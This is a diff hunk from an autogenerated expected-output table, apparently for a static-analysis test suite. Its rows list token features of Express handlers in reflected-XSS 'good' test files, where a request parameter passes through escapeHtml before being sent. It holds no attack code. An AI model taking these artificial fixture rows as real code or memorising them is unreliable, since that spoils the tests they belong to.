autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:7:137:10 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:22 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:22 | escapeHtml1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:22 | escapeHtml1 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:22 | escapeHtml1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:22 | escapeHtml1 | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | escapeHtml1(url) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | escapeHtml1(url) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | escapeHtml1(url) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20975,6 +140006,41 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | escapeHtml1(url) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | escapeHtml1(url) | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | escapeHtml1(url) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | exceptional return of escapeHtml1(url) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | exceptional return of escapeHtml1(url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | exceptional return of escapeHtml1(url) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | exceptional return of escapeHtml1(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:137:12:137:27 | exceptional return of escapeHtml1(url) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:5 | res | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:5 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:10 | res.send | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:10 | res.send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:10 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | exceptional return of res.sen ... 2(url)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | exceptional return of res.sen ... 2(url)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | exceptional return of res.sen ... 2(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | exceptional return of res.sen ... 2(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | exceptional return of res.sen ... 2(url)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | res.sen ... 2(url)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | res.sen ... 2(url)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | res.sen ... 2(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | res.sen ... 2(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:3:138:28 | res.sen ... 2(url)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:7:138:10 | send | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:7:138:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:7:138:10 | send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:7:138:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:7:138:10 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:22 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:22 | escapeHtml2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:22 | escapeHtml2 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:22 | escapeHtml2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:22 | escapeHtml2 | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | escapeHtml2(url) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | escapeHtml2(url) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | escapeHtml2(url) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20983,6 +140049,41 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | escapeHtml2(url) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | escapeHtml2(url) | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | escapeHtml2(url) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | exceptional return of escapeHtml2(url) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | exceptional return of escapeHtml2(url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | exceptional return of escapeHtml2(url) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | exceptional return of escapeHtml2(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:138:12:138:27 | exceptional return of escapeHtml2(url) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:5 | res | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:5 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:10 | res.send | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:10 | res.send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:10 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | exceptional return of res.sen ... 3(url)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | exceptional return of res.sen ... 3(url)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | exceptional return of res.sen ... 3(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | exceptional return of res.sen ... 3(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | exceptional return of res.sen ... 3(url)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | res.sen ... 3(url)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | res.sen ... 3(url)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | res.sen ... 3(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | res.sen ... 3(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:3:139:28 | res.sen ... 3(url)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:7:139:10 | send | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:7:139:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:7:139:10 | send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:7:139:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:7:139:10 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:22 | escapeHtml3 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:22 | escapeHtml3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:22 | escapeHtml3 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:22 | escapeHtml3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:22 | escapeHtml3 | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20991,6 +140092,41 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | exceptional return of escapeHtml3(url) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | exceptional return of escapeHtml3(url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | exceptional return of escapeHtml3(url) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | exceptional return of escapeHtml3(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:139:12:139:27 | exceptional return of escapeHtml3(url) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:5 | res | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:5 | res | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:10 | res.send | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:10 | res.send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:10 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | exceptional return of res.sen ... 4(url)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | exceptional return of res.sen ... 4(url)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | exceptional return of res.sen ... 4(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | exceptional return of res.sen ... 4(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | exceptional return of res.sen ... 4(url)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | res.sen ... 4(url)) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | res.sen ... 4(url)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | res.sen ... 4(url)) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | res.sen ... 4(url)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:3:140:28 | res.sen ... 4(url)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:7:140:10 | send | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:7:140:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:7:140:10 | send | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:7:140:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:7:140:10 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:22 | escapeHtml4 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:22 | escapeHtml4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:22 | escapeHtml4 | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:22 | escapeHtml4 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:22 | escapeHtml4 | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | escapeHtml4(url) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | escapeHtml4(url) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | escapeHtml4(url) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20999,18 +140135,114 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | escapeHtml4(url) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | escapeHtml4(url) | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | escapeHtml4(url) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | exceptional return of escapeHtml4(url) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | exceptional return of escapeHtml4(url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | exceptional return of escapeHtml4(url) | enclosingFunctionBody | req res url req params id res send escapeHtml1 url res send escapeHtml2 url res send escapeHtml3 url res send escapeHtml4 url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | exceptional return of escapeHtml4(url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:140:12:140:27 | exceptional return of escapeHtml4(url) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:0 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:0 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escape | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escape | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escapeHtml1 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | escapeHtml2 | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | matchHtmlRegExp | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | matchHtmlRegExp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | matchHtmlRegExp | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | require | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | require | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | textContentType | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:1:1:1 | textContentType | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:10 | escape | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:10 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:10 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:10 | escape | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:35 | escape | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:35 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:35 | escape | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:35 | escape ... -html') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:35 | escape ... -html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:5:1:35 | escape ... -html') | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:20 | require | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:20 | require | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:35 | exceptional return of require ... -html') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:35 | exceptional return of require ... -html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:35 | exceptional return of require ... -html') | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:35 | require ... -html') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:35 | require ... -html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:14:1:35 | require ... -html') | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:22:1:34 | 'escape-html' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:22:1:34 | 'escape-html' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:22:1:34 | 'escape-html' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:22:1:34 | 'escape-html' | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:22:1:34 | 'escape-html' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:1:22:1:34 | 'escape-html' | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:11 | express | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| 